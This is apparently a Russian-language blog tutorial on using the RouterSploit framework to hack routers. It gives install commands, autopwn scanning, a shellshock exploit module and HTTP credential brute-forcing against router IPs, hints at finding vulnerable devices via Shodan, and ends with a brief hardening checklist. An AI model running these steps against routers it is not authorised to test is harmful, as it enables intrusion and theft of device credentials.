RouterSploit - как взломать сеть

RouterSploit - как взломать сеть

overbafer1

В этом статье вы узнаете информацию по выявлению уязвимостей маршрутизаторов - RouterSploit. Этот инструмент создан по образцу Metasploit, и вы найдете много общего; однако Routersploit специализируется на взломе маршрутизаторов. Подобный взлом мне удалось осуществить на одном из моментов для подключения к камере видеонаблюдения .

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ:  это образовательная статья, предназначенная для ознакомления. Не используйте этот инструмент во вред, т.к. добром это не кончится.

Требования к routersploit

  • Python
  • доступ к интернету
  • знание командной строки
  • Установка RouterSploit в Kali Linux

Шаг 1. Установка routersploit

Чтобы установить routersploit в Kali Linux, откройте терминал и введите следующие команды в том же порядке, что и ниже:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Шаг 2: Запуск RouterSploit

Для запуска routersploit требуется перейти в директорию этого инструмента и выполнить следующее:

python3 rsf.py

Если вы хотите увидеть все возможные эксплойты, просто введите следующее:

show all

Теперь давайте начнем со сканирования маршрутизатора и выяснения, есть ли в нем какие-либо уязвимости. 

Шаг 3: сканирование цели

Чтобы просканировать маршрутизатор на предмет всех возможных эксплойтов, мы будем использовать модуль сканера Autopwn, чтобы найти любые уязвимости, которые влияют на наш целевой маршрутизатор. Но сначала вам нужно найти IP-адрес целевого маршрутизатора. Я буду показывать на примере своего.

По умолчанию многие маршрутизаторы используют 192.168.0.1. или 192.168.1.1. И для сканирования цели нужно ввести следующее:

use scanners/auto pawn
show options

В нашем случае мы установим цель на IP-адрес маршрутизатора 192.168.0.1. Введите «set target», затем IP-адрес маршрутизатора, после клавишу enter. Затем, введите run, чтобы начать сканирование.

set target 192.168.0.1
run

Шаг 4: Выбор и настройка эксплойта маршрутизатора

После завершения сканирования мы увидим все уязвимости, влияющие на маршрутизатор. 

Начнем с простого эксплойта. Воспользуемся эксплойтом shellshock; введем следующие команды.

use exploits/generic/shellshock
show options

Вы сможете установить цель, набрав:

set target <target router IP>

Шаг 5: Запуск эксплойта

Вы можете выполнить полезную нагрузку, набрав run .

Если эксплойт будет успешным, вас встретят внутренние параметры конфигурации и пароли, а также имена пользователей, которые можно использовать для взлома и управления маршрутизатором.

Эти эксплойты могут привести к утечке логина и пароля пользователей, паролей по умолчанию (например, admin), серийных номеров устройств и т.д.

Например, если вы хотите подобрать и взломать имя пользователя и пароль маршрутизатора, введите следующие команды:

use creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce) > show options
set target 192.168.0.2
run

В Shodan можно встретить массу уязвимых устройств, к которым без особых проблем можно получить доступ

Однако на практике с реальным внешним IP адресом я не буду это демонстрировать, дабы оградить неокрепшие умы от неправомерного доступа.

Как я могу обезопасить себя от взлома роутера?

Большинство людей настраивают роутеры один раз в жизни и полностью о них забывают. Они не могут изменить настройки маршрутизаторов по умолчанию, даже образованные сетевые администраторы не склонны это делать (из-за лени).

Но вы можете сделать следующее:

  • Обновите прошивку роутера
  • Отключить пин-WPS
  • Включить безопасность wpa2
  • Выбирайте надежные пароли
  • Остановить трансляцию SSID
  • Используйте фильтры MAC


ИНФОРМАЦИЯ НАПИСАНА ИСКЛЮЧИТЕЛЬНО В

ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ


Наши проекты:

cryptover1 - торгую на Binance

overbafer1 - личная телега

LamerLand - все для хацкера понятным языком 

Testland - резерв


YouTube:

Второй канал

Основной канал


Наш мерч

Report Page